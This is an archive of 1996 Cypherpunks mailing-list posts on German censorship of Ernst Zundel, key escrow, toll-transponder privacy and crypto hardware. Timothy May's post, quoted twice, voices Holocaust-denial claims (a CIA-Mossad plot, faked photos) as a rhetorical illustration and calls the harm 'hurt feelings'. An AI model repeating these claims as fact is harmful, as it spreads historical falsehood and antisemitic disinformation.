to characterizing those who ask different and reasonable
questions as having asked the Canonical Question instead and
having also given the wrong answer to it.

It is of course then necessary to censor the ability of the
public to view the original questions, since this would not only
cast aspersions upon ones credibility, but would also require
that they be answered, the avoidance of which was the reason for
the original exercise in misdirection.

While such political tactics work well in a world with a
traditional hierarchical flow of information from the Big Press
to the Little Citizen-Unit, they collapse completely under the
Cooperative Anarchy of the Net, and blow up in the faces of those
who attempt them.

The Simon Wiesenthal Center desparately needs to regroup and try
to understand how the Net works, before applying its traditional
methods of debate and advocacy to an environment where completely
different rules apply.  This is not to deny the Holocaust, or to
say that the SWC doesn't have its heart in the right place.  This
is simply an attempt to spare them any more self-inflicted
wounds.

 > If the Germans are suppressing attempts to get at the
 > truth, I suspect the stories are true that the Holocaust
 > was part of Truman's "Big Lie."

Many people are likely to think this based on the Germans
behavior, and the Germans need to learn that the remedy for Hate
Speech is more speech, especially in an environment as
uncontrollable as the Net.

 > [Note: I present this as a line of thinking that is
 > actually often the result of suppression of views. "If They
 > are suppressing it, maybe there's some truth to it." Note
 > also that the views of Zundel and other Holocaust Deniers
 > are not causally related to the deaths of millions of Jews,
 > gypsies, and others in WW II. The damage, if any, is in the
 > "hurt feelings" and "insults" felt by survivors and their
 > relatives.

It is interesting to note that there is no specific law
prohibiting free speech for Holocaust Agnostics in Germany. The
actual laws under which such cases are prosecuted are libel laws,
which have been liberally interpreted to mean that one may not
"libel" deceased Jews as a class or their memory in the minds of
their surviving relatives.

The notion of libeling a class of deceased persons strikes me as
a dangerous and particularly convoluted legal fiction. (Although
I certainly don't mean any disrespect for the deceased or their
survivors when I say this.)

 > The other danger often cited, that Zundel will recruit a
 > Fourth Reich or somesuch, is no more likely than that Jerry
 > Falwell will recruit a New Crusade, or that J. Random Ranter
 > will do the same. In a free and open society, we let people
 > believe in "wrong ideas" (witness Christianity, Islam,
 > Scientology, Judaism, and a thousand other cults).]

The solution to Mr. Zundel is the same as the solution to
Archemedes (Ne Ludvig) Plutonium.  Allow him complete freedom of
speech to express his theories, debunk him as time permits, and
if all else fails, put him in your killfile.

The chances that Mr. Zundel will organize a Fourth Reich are
about the same as those that Archmedes Plutonium will force us
all to do our mathematics with his N-Adics.  It's not something
I'm going to spend a lot of time worrying about.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 29 Jan 1996 04:56:22 +0800
To: cypherpunks@toad.com
Subject: The Big Lie
Message-ID: <ad311df817021004e4bb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:59 PM 1/28/96, Mike Duvos wrote:

>I just visited the Ernst Zundel Webcom page, which given the
>number of server overload errors I experienced trying to browse
>it, is now the Numero Uno Web Site on the entire Internet, thanks
>to some anonymous and largely clueless official running
>telecommunications services for the former Third Reich.

Like many born after the Second World War, I took it as a fact that the
so-called Holocaust actually happened. I saw pictures of death camps,
interviews with survivors, etc.

But if it really happened, why are so many countries trying to suppress the
evidence that it was all just a CIA-Mossad plot? It seems more likely that
the pictures were faked, or were pictures taken of dying Germans in Russian
POW camps on the Eastern Front.

If They are trying to suppress discussion, maybe there's something to their
ideas.

If the Germans are suppressing attempts to get at the truth, I suspect the
stories are true that the Holocaust was part of Truman's "Big Lie."

--Tim



[Note: I present this as a line of thinking that is actually often the
result of suppression of views. "If They are suppressing it, maybe there's
some truth to it." Note also that the views of Zundel and other Holocaust
Deniers are not causally related to the deaths of millions of Jews,
gypsies, and others in WW II. The damage, if any, is in the "hurt feelings"
and "insults" felt by survivors and their relatives. The other danger often
cited, that Zundel will recruit a Fourth Reich or somesuch, is no more
likely than that Jerry Falwell will recruit a New Crusade, or that J.
Random Ranter will do the same. In a free and open society, we let people
believe in "wrong ideas" (witness Christianity, Islam, Scientology,
Judaism, and a thousand other cults).]

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Mon, 29 Jan 1996 03:30:30 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Denning's misleading statements
Message-ID: <ad317abe070210042132@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



>I've never met Dorothy Denning, so I hesitate to characterize
>her as a
>villainess. But certainly she's the only noted cryptographer I
>know of
>who's gone so far out on a limb to defend a position the vast
>majority of
>computer scientists, civil libertarians, and cryptographers
>scoff at. (And
>I don't just mean it is we libertarians and civil libertarians
>who are
>scoffing, I mean that nearly every noted expert who has
>carefully reviewed
>the various schemes to control crypto and to provide GAK has
>found them to
>be essentially unenforceable except via draconian police state
>methods, and
>maybe not even then.)

I believe that David Gelerntner, the professor of computer
science at Yale University injured by a UNABOMBER bomb, is also
a supporter of the Clipper chip. This may or may not be
something that arose from the bombing. But I'm not sure how many
cavaets and things he adds to his position. He may have changed
it. But then he's not exactly a cryptographer.

But, on the other side of the fence, I just passed a section in
_Takedown_ where Shimomura and the FBI agents decide that the
best place for the Clipper phones is "in the trunk." Apparently
they don't communicate with regular phones so they were
practically worthless.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 29 Jan 1996 06:55:52 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: NWLibs> Re: Anonymous trashing of  Assassination Politics
Message-ID: <2.2.32.19960128224012.0091961c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:38 AM 1/28/96 -0800, jim bell wrote:

>I guess I should offer a partial apology, even though I'm not really 
>responsible for this.  Jack Hammer is the on-air name for John Benneth, who 
>is a local (to me, Portland, Oregon) "moderator" for a "advertised as 
>controversial" radio talk call-in show.  He saw my Assassination Politics 
>essay a few months ago, and for a few weeks just before the November sweeps 
>Neilsen ratings period he was trying to bait me into calling in, thinking 
>I'd be a sucker for a local audience. (He _needs_ controversy to be 
>sucessful.)  Since then he gave up for a while, although he occasionally 
>snipes at me.  I assume his interest will wax and wane as various ratings 
>periods  come and go.

Actually ratings do not apply in this case.  KKEY does not subscribe to the
ratings service.  (Never has, to my knowledge.)  KKEY is a part time
station.  It has never had much of a broadcast range.  (And never will, as
their equiptment causes interfearence with neigboring phone equiptment and
the like.) It is supported by advertising which is pitched by the talk show
host themselves.  It has never had much of an audience. The talk show hosts
run the gamut from  conservitive to very conservitive.  (The former owner
had a habit of firing hosts on the air if he did not like their views.  But
Ralph is dead now...)  It has a very bad reputation in Portland as being a
station for neo-nazis, whackos and cranks.

(Back in my conservitive days i had friends who worked there.  It was an
"interesting" experience.)

>>I have saved Jim Bell's "Assassination Politics" essay, with his PGP 
>>signature, and soon to be a lot of other things, at 
>>
>> http://www-leland.stanford.edu/~llurch/Not_By_Me_Not_My_Views/
>
>Thank you.  I guess...
>
>BTW, I sent the file to you as A16.???  That isn't a really descriptive
>name.  Please change it to something more mnemonic, like ASPOL.TXT or
something.

The site does need an index.

>>I plan to collect as many off-the-wall conspiracy theories in this 
>>directory as will fit in my disk quota. And when I run out of quota, I'll 
>>raise it for myself.
>
>Now, now, Rich, "Assassination Politics" is not a "conspiracy theory".  Or, 
>at least, it's not your classic "conspiracy theory."  

I think he is collecting stuff he thinks of as whacky theories.  

>>I think it's time the wacky right and wacky left started looking at each
>>other's Web pages and lurking on each others' lists.
>
>What about the wacky libertarians?  Why did you leave us out?!?
>Waaaaaaahhhh!!!

I think he is collecting stuff that is just "whacky".

>> It's really funny
>>putting two "Anarchist" pages, one featuring Che Guevara, the other
>>featuring David Duke, side by side. Both say the guvment is out to get
>>them;
>
>I, on the other hand, am out to "get" the government.  But you'll be hearing 
>more about that later.

Unless they get you first...  

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
         Is the operating system half NT or half full?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Hammer <jh@teleport.com>
Date: Mon, 29 Jan 1996 07:12:23 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: [NOISE] Re: NWLibs> Re: Anonymous trashing of Assassination Politics
In-Reply-To: <m0tgb3n-00090IC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960128141925.22820H-100000@julie.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


> I guess I should offer a partial apology, even though I'm not really 
> responsible for this.  Jack Hammer is the on-air name for Bob Dole, who 
> is a local (to me, Portland, Oregon) "moderator" for a "advertised as 
> controversial" radio talk call-in show.  He saw my Assassination Politics 
> essay a few months ago, and for a few weeks just before the November sweeps 
> Neilsen ratings period he was trying to bait me into calling in, thinking 
> I'd be a sucker for a local audience. (He _needs_ controversy to be 
> sucessful.)  Since then he gave up for a while, although he occasionally 
> snipes at me.  I assume his interest will wax and wane as various ratings 
> periods  come and go.

Occasionally snipes at you? I've been perching here out in front of you
daily now for the last two weeks. We've installed a Washington State phone
line just for you. We've built an AM transmitter and purchased a satellite
connection and bought satellite brodcast time and linked it to the little
princess phone next to your fart sack so you can call us up and share your
wonderful ideas with people in their beds and in their cars all over North
America and you can do all this without having to even roll out of bed.
Now you're saying it hasn't been easy enough for you? How much a minute do
you think this costs us, just waiting for you to call? Oh, others have to
pay to advertise THEIR ideas, in fact they consider the time so valuable
they pay for that time by the second, but has anyone asked Jim Bell for as
much as one thin dime for any of our time? 

Not anyone at all.

Jim Bell, you're ducking this the same way you ducked my hat when I was 
passin' it around for Richard Gray. 

Perhaps being cheap goes hand in hand with intellectual cowardice. 
For two weeks now, 10 days, we've been sitting down here just waiting 
for you to call (360) 693-5539 between 6:00 AM and 8:00 AM PST to put you 
on the air live. And no, I won't cut you off. If you're such a shy fellow 
I will promise to not even argue with you, just let you blow anything you 
want but obcenities as long as you stay on topic.

But you're not going to call. You won't discuss your idea in public, which
is nothing more than a plan to commit murder for political purposes, i.e.
racketeering. You seem to think that we'll accept your plan as the way to
open the gateways to a new universe of warmth and roses. What it is is the
doorway to a hell full of more drive by shootings and reprisals and 
paranoia and fear. And seeing the comatose response from most of the people
on these lists demonstrates to me just how close the society is to letting
something like that which you propose actually happen. 

> Klaatu Burada Nikto
> 
> "Something is going to  happen...             Something....Wonderful!"

Yeah, right, at least now we know that it's not going to be a phone call.

                           HOW TO JOIN THE HAMMERNET. 

Receive the most interesting e-mail and get to know the best writers on
the Internet. Saints and flamers, they're on the Hammernet! Here's how to
join. Send the following message in the body of your text space to
majordomo@teleport.com : 

                           subscribe hammernet-l

                           It's as easy as that!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 29 Jan 1996 07:28:52 +0800
To: cypherpunks@toad.com
Subject: Re: The Big Lie
In-Reply-To: <9601282214.AA13074@sulphur.osf.org>
Message-ID: <199601282309.PAA28023@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Salz <rsalz@osf.org> writes:

 > That's an interesting point, but it does not apply to the
 > majority of humanity.  "The Holocaust" is not an O.D. of
 > something, it is a shorthand term for things like Final
 > Solution and the camps.

Regardless of what one wishes to call such a term, there are
obvious dangers to using shorthand, abbreviations, OD's,
acronyms, and other such things as if they possessed predictive
power, or some magical ability to explain the things they
reference by virtue of their construction.  It is of course even
sillier to question their existence.

If I define "Salz Syndrome" as a tendency by people named "Rich"
to post messages suggesting that discussions of Holocaust
semantics are off-topic for the Cypherpunks list, then I have to
a certain extent stacked the deck when rhetorically asking
questions like...

     Why does Rich post such messages?

Or when I answer a question about the legitimacy of Saltz
Syndrome as a real disease by feigning surprise and saying
indignantly - "Surely you are not suggesting Saltz Syndrome
doesn't exist!?"

By the same token, I don't feel "Did the Holocaust happen?" is a
particularly well-formed or useful question. The answer, by
almost any criteria, is most certainly "Yes", and answering the
question tells me nothing I didn't know before I asked it.

All of this is of course orthogonal to the point I was trying to
make, which is that while such flaws of logic and debate go
largely unnoticed in the unconnected world, and often result in
the winning of debates, they generally get flamed royally on the
Net, where a different set of rules apply.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Mon, 29 Jan 1996 04:26:25 +0800
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: Denning's misleading statements
In-Reply-To: <ad317abe070210042132@[199.125.128.5]>
Message-ID: <Pine.A32.3.91.960128150946.22588C-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Jan 1996, Peter Wayner wrote:

> I believe that David Gelerntner, the professor of computer
> science at Yale University injured by a UNABOMBER bomb, is also
> a supporter of the Clipper chip. This may or may not be
> something that arose from the bombing. But I'm not sure how many
> cavaets and things he adds to his position. He may have changed
> it. But then he's not exactly a cryptographer.

There's quite a few folks in the Yale CS department that are pro-Clipper
or fence sitters.  They justify it in class by claiming that law
enforcement needs these abilities if LE is to remain effective. 

FWIW, Gerlernter is in the Parallel group here.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed      Finger samman@powered.cs.yale.edu for key
Want to give a soon-to-be college grad a job?         Mail me for a resume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Sun, 28 Jan 1996 23:41:54 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <Pine.SV4.3.91.960127193741.11084F-100000@larry.infi.net>
Message-ID: <310ad283.38852789@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Jan 1996 19:46:52 -0500 (EST), you wrote:

> There is a story floating around XXXXXX circles that The Japanese carrier
> approaching Pearl was spotted on the recently-installed (Navy) land radar
> in Hawaii. The target was reported out of the ops room, but ignored by the
> same situation room that screwed up (years later) the response to the
> Pueblo's distress calls in international waters just offshore from North
> Korea. 

Color me VERY skeptical.  The Japanese ships were WELL over the
horizon from any point on Oahu.  OTH radars are quite difficult to
build effectively, and radar technology at the end of 1941 was quite
primitive.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dfickes@advice.com (David Fickes)
Date: Mon, 29 Jan 1996 08:26:48 +0800
To: cypherpunks@toad.com
Subject: The boss is watching...
Message-ID: <9601282337.AA12709@advice.com>
MIME-Version: 1.0
Content-Type: text/plain



 
 I've just been contacted by the producer of a cable news/analysis
 program who is putting together a show focusing on employees fooling
 around on the Web and what employers can do about it. (Trust their
 employees?). 
 
 She is very interested in stories and tales of employers who have
 taken action against employee "abuse" but also is looking for 
 companies that have policies that satisfy the "auditors" without 
 becoming "onerous." She has convinced me that she is interested 
 in presenting a balanced report and I've offered to gather whatever
 information I can lay my hands on before Feb 2.
 
 Incidentally, I was contacted because of my work on the announcement
 of "Internet WatchDog", a computer monitoring tool, which was 
 previously mentioned on the list. 
 
 Thanks for your help in advance...
 
 regards, -d
 
 David Fickes                                    dfickes@advice.com
 ADVICE Marketing                                phone: 415/321-2198
 366 Cambridge Avenue                              fax: 415/321-2199
 Palo Alto, CA 94306
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 29 Jan 1996 05:04:54 +0800
To: liberty@gate.net (Jim Ray)
Subject: Re: An Enigma - Wrapped In a Circle
In-Reply-To: <199601270257.VAA40304@osceola.gate.net>
Message-ID: <199601282046.PAA26188@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Ray writes:
[An article about CROP CIRCLES for chrissake, and then has the
temerity to say.]
> If you think that this post has "no
> cypherpunk relevance" you can:
> 1. Flame me, in *private* e-mail. [I'll happily ignore you.]
> 2. Go hump a tree.

What the hell is the cypherpunks relevance here, anyway? I mean, other
than trying to elicit a response from me, which you surely knew would
show up, was there any purpose to this? Why are crop circles important
to people worrying about cryptography and cryptography policy? What
possible linkage could there be?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Mon, 29 Jan 1996 08:23:34 +0800
To: tcmay@got.net (Timothy C. May)
Subject: [NOISE] Re: The Big Lie
Message-ID: <2.2.32.19960128235423.0039a63c@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


My grandfather was drafted towards the end of world war ii. he was a doctor and was among the first medical teams to land at anzio. his hospital was the first to arrive at auswitz <sp?>. When asked how that affected him, my grandmother said "After he returned from the war there was no joy left in him." 

I do not doubt the existance of prison camps in the third reich. Whether the stories have been exaggerated is another question. Besides in this day and age where Isreal is a nuclear arsenal run by nutty rightwing warlords who in their right mind would dare belittle their tragedies.

Rewriting history is a powerful tool, whether it be the history of the death of Hendrix, the death of Kennedy, the logging of the pacific northwest or of ethnic cleansing.

The only way to combat the powerful who would seek to rewrite history is to create an authenticatable system for document storage. Text books have long been regarded as the predominant model yet, pick up any high school history book and marvel at the differences from say Zinn's "The People's History of the United States". What is needed is more though. A system whereby one can trace the source of the information to the actual time and place of an event as well as authenticating identity.



At 02:07 PM 1/28/96 -0800, you wrote:
>At 7:59 PM 1/28/96, Mike Duvos wrote:
>
>>I just visited the Ernst Zundel Webcom page, which given the
>>number of server overload errors I experienced trying to browse
>>it, is now the Numero Uno Web Site on the entire Internet, thanks
>>to some anonymous and largely clueless official running
>>telecommunications services for the former Third Reich.
>
>Like many born after the Second World War, I took it as a fact that the
>so-called Holocaust actually happened. I saw pictures of death camps,
>interviews with survivors, etc.
>
>But if it really happened, why are so many countries trying to suppress the
>evidence that it was all just a CIA-Mossad plot? It seems more likely that
>the pictures were faked, or were pictures taken of dying Germans in Russian
>POW camps on the Eastern Front.
>
>If They are trying to suppress discussion, maybe there's something to their
>ideas.
>
>If the Germans are suppressing attempts to get at the truth, I suspect the
>stories are true that the Holocaust was part of Truman's "Big Lie."
>
>--Tim
>
>
>
>[Note: I present this as a line of thinking that is actually often the
>result of suppression of views. "If They are suppressing it, maybe there's
>some truth to it." Note also that the views of Zundel and other Holocaust
>Deniers are not causally related to the deaths of millions of Jews,
>gypsies, and others in WW II. The damage, if any, is in the "hurt feelings"
>and "insults" felt by survivors and their relatives. The other danger often
>cited, that Zundel will recruit a Fourth Reich or somesuch, is no more
>likely than that Jerry Falwell will recruit a New Crusade, or that J.
>Random Ranter will do the same. In a free and open society, we let people
>believe in "wrong ideas" (witness Christianity, Islam, Scientology,
>Judaism, and a thousand other cults).]
>
>Boycott espionage-enabled software!
>We got computers, we're tapping phone lines, we know that that ain't allowed.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Higher Power: 2^756839 - 1  | black markets, collapse of governments.
>"National borders aren't even speed bumps on the information superhighway."
>
>
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 29 Jan 1996 05:21:57 +0800
To: Steve@aztech.net (Stephen P. Gibbons)
Subject: Re: Possible Java hack.
In-Reply-To: <v01510100ad2f798f0beb@[198.182.221.3]>
Message-ID: <199601282101.QAA26228@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Stephen P. Gibbons writes:
> ObCrypto:  _When_ will DNS be secured via PKE?

There is already an extant proposal from the DNSSEC working group of
the IETF. It will probably go to proposed standard.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 29 Jan 1996 06:38:50 +0800
To: olmur@dwarf.bb.bawue.de (Olmur)
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <2.2.32.19960128115634.00977b14@panix.com>
Message-ID: <9601282202.AA04860@alpha>
MIME-Version: 1.0
Content-Type: text/plain



olmur@dwarf.bb.bawue.de writes:
 > It's illegal in Germany to publish material denying the holocaust.  In
 > the same moment this guy sent his book XXX per snail-mail from Canada
 > to Germany he commited a crime here in Germany.

Hi.  President M5 of Psychonia here.  I'm afraid we've recently
enacted legislation in the tiny nation of Psychonia that makes it
illegal to parenthesize question marks in electronic mail messages,
because such acts are a direct offense to some of the members of
primitive hill tribes who live in remote portions of our land.

I issue this warning not to set foot in Psychonia or any of the
countries with whom we share extradition treaties, or you will be
arrested and brought here for trial, conviction, and punishment.

______c_____________________________________________________________________
Mike M Nally * Tivoli Systems * Austin TX   * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kari Laine <buster@klaine.pp.fi>
Date: Sun, 28 Jan 1996 23:52:58 +0800
To: cypherpunks@toad.com
Subject: Re: Belgium has 'key escrow' law
In-Reply-To: <v0213050cad2ddf2eecd7@[199.2.22.120]>
Message-ID: <MAPI.Id.0016.00617269204c61693744364330353931@MAPI.to.RFC822>
MIME-Version: 1.0
Content-Type: text/plain


Hi Dounglas,

>I should also point out that Belgium apparently has crypto
>export laws of sufficient complexity to inspire me to look
>elsewhere when attempting to purchase a hardware encryption
>board from a Belgian company (uti-maco). Said company also
>was under the mistaken belief that I needed a US _import_
>license; my failed attempts to persuade them otherwise was
>the final kicker.
>------                                                             ------
>Douglas Barnes         "The tighter you close your fist, Governor Tarkin,
>cman@communities.com    the more systems will slip through your fingers."
>cman@best.com                                             --Princess Leia

We are selling both uti-maco SafeGuard Systems GmbH and
uti-maco Belgium products here in Finland and haven't 
had any problems with the licences whatsoever. Naturally
you have to fill in certain blankets and get the permission
but that's same kind of a procedure no matter what European
country you would be buing cryptohardware and software. 
I will forward your message to uti-maco Belgium so that
if there has been any misunderstanding they can sort it out.

Of course my opinion is biased but uti-maco Belgium is doing
top notch crypto libraries and hardware. That intelligent 
(own processor) cryptoboard which has RSA/DES chips on board
is great for any software company wanting to include REAL
crypto in their products. Also what makes their implementation
especially usefull is the easy and clear API for programmers
and that the implementation is scalable to different 
throughputs without changes in the API. Also the possibility
in API calls to decide where a certain operation should be
done is a nice feature. So if there is a smartcard connected
to a machine all the secret key operations would be done on
the SC not with the software. 

So uti-maco Belgium stuff is one of the best available in 
Europe. The other big supplier for these things is Crypto AG
in Schwitzerland. In Finland there are two companies who might
have what you are loogking for, Setec Oy, in Helsinki and Instrumentointi Oy, 
in Tampere. The latter one at least have a nice encrypting
bridge (includes also some routing and filtering capabilities)
with a better algorithm than DES (I understood other
algrithms would also be available than their own). 

I don't have the contact information at hand now but let me 
know if you need it.


Best Regards
Kari Laine
LAN Vision Oy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 28 Jan 1996 23:35:01 +0800
To: cypherpunks@toad.com
Subject: TollRoad (CA 91) and anonymity (fwd)
Message-ID: <199601281520.QAA04604@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


From: gregbrooks@earthlink.net (Greg Brooks)
Newsgroups: misc.transport.road,rec.autos.driving,ca.driving
Subject: TollRoad (CA 91) and anonymity
Date: 26 Jan 1996 03:08:09 -0500
Organization: Woo Studios Ltd.
Lines: 103
Sender: dc@panix3.panix.com
Message-ID: <xz3vilzcr9y.fsf_-_@panix3.panix.com>
References: <4cv5j5$9ar@news.netvoyage.net>
	<dmoorman-1101961517300001@d189.nb.interaccess.com>
	<hatunenDL1F08.ILx@netcom.com> <4d6a2u$rh9@curly.cc.emory.edu>
	<hatunenDL3615.63@netcom.com> <1996Jan15.033217@clstac>
	<DLBBxG.5v7@freenet.carleton.ca>
	<gregbrooks-2201962151180001@gregbrooks.earthlink.net>
	<xz3wx6g8svx.fsf@panix3.panix.com>
NNTP-Posting-Host: panix3.panix.com
In-reply-to: dc@panix3.panix.com's message of 25 Jan 1996 05:34:43 -0500
X-Newsreader: Gnus v5.0.13



> From gregbrooks@earthlink.net Thu Jan 25 12:30:45 1996
> Date: Thu, 25 Jan 1996 09:39:18 -0800
> To: Minister of Truth <dc@panix.com>
> From: gregbrooks@earthlink.net (Greg B.)
> Subject: Re: Tolls and private highways (was: Re: private highway?)
> 
> >The following message is a courtesy copy of an article
> >that has been posted as well.
> 
> [please post my response to the appropriate usenet groups -- I'm at work
> and only have email here at my office.]
> 
> 
> >[1] How easy is it to clone a valid toll box thingie (the thing you buy
> >    and put in your car) ?    Such cloning has been a problem with
> >    cellular phones.
> 
> There's a custom chip inside the transponder, so cloning is going to be
> pretty much impossible without access to a supply of those chips.
> Additionally, the communications between the transponder and the antenna
> array, as well as between the array and our computer system, are encrypted.
> 
> 
> 
> >[2] How actually does one buy a toll thingie and put money into an account ?
> >    Are they on sale at 7-11 or gas stations, or where ?
> 
> We offer the transponders via mail (you can call an 800 number for an
> application) and via a customer-service center for walk-ins. There's some
> talk of exploring mass market channels, but nothing firm yet.
> 
> >
> >[3] How does one add more money to a thingie ?  Or does one add money
> >    to an account, and leave the thingie unchanged ?
> 
> The thingie remains unchanged. (Sounds prophetic, no?) When you sign up for
> an account and transponder, here's what happens: If you sign up for a
> credit-card account, we take an imprint of your card in lieu of a deposit
> on the transponder, and we start your account off with a minimum balance of
> $40. You, as a customer, agree to let us go back to your credit card and
> replenish the account based on a pre-agreed amount when the balance reaches
> a minimum level (typically $10). We also do the same for checking accounts
> (automatic withdrawl) and have cash options for those customers who aren't
> comfy with recurring automatic transactions on their card or account. The
> replenishment of the accounts is system-based -- that is, you don't need to
> physically bring your transponder in for a "fill up."
> 
> >
> >[4] If one is required to give a name when setting up an account
> >    is it an offense to give a false name ?
> 
> We have an anonymous account option.
> 
> 
> >[5] I have concerns about the privacy of the information collected
> >    about who goes where when.  I suspect that your company will comply
> >    with a court order or search warrant rather than dual to the death with
> >    the SWAT team.   How often and how thoroughly do you purge your
> >    records ?
> 
> Our records are much like those kept by the phone company -- they're sealed
> to the public and to official requests that aren't accompanied by a court
> order. One area where we're actually more concerned about privacy than the
> state of California is in the area of mailing lists. Quite simply, we'll
> never sell our customer list to anyone for any reason -- but even the state
> DMV sells lists. We don't ever purge our records.
> 
> 
> >
> >[6] How many intersections/on/off/ramps are there ?
> 
> The project is a true express lanes configuration -- no intermediate
> access. Basically, you get on at one end and get off 10 miles later.
> Flexible channelizers form the barrier between the freeway and the project,
> so in an emergency you could get out if you needed to.
> 
> 
> 
> >[7] What is the speed limit and who set it  ?
> 
> Because the project was dedicated as part of the state highway system
> before we opened to the public, the speed limit is the same as the adjacent
> freeway -- 65 mph.
> 
> 
> >
> >[8] What is the largest/heaviest/most-wheeled vehicle you accept ?
> 
> No trucks hauling boats or large horse trailers. No 18-wheelers. Bobtail
> trucks are OK, I believe (I'll double-check this).
> 
> 
> Hope this helps!
> 
> //greg brooks
> gregbrooks@earthlink.net
> 
> 
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 29 Jan 1996 06:24:09 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Denning's misleading statements
In-Reply-To: <ad2ff0ab010210043115@[205.199.118.202]>
Message-ID: <199601282154.QAA26286@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> One of the interesting things about the whole crypto debate, going back at
> least to the Clipper announcement (and actually some months before) has
> been that the pro-restrictions, pro-GAK side of the argument has almost no
> defenders! Except for David Sternlight, Dorothy Denning, and Donn Parker
> ("attack of the killer Ds"?), there are almost no public spokesmen for the
> pro-restriction, pro-GAK side.

Well, not really. Silvio Micali did some work on this topic. We also
get the lovely folks from the FBI making their public appeals (replete
with references to snuff films and other nonexistant threats), and Stu
Baker, former NSA official, does his periodic "insult the nerds"
schtick. There are others. The point is taken, though.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 29 Jan 1996 06:34:18 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: "Concryption" Prior Art
Message-ID: <01I0JULCV3Z4A0UMAT@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	It occurs to me that such a combined form would be useful for the
idea of having a message that can get multiple results depending on the
passphrase used. One example might work as follows:
	A section of data is placed at the beginning of the encrypted material.
When it is decrypted or encrypted (depending on how one wants to work things)
with a given passphrase, it turns out a series of bits, reiterated as needed.
Each x bits is used to say how far along in the encrypted material the next
piece of information making up one encrypted message (using the same
passphrase) is. If you put in a different passphrase, you get a different
series of bits, and thus use a different set of information for the encrypted
material. The 
	The major problem that I can see with this scheme is overlap between
messages. I would guess that one would need to keep coming up with different
data sections until one originated that wasn't a problem. How long this would
take would depend on the value of x and how long the data section was. However,
this should only need to be done once for a given set of passphrases and the
corresponding key (used for all of them). Any alternate suggestions?
	Not being a programmer, I have no real idea how to put this concept
into practice. (And, moreover, someone else came up with the idea of multiple
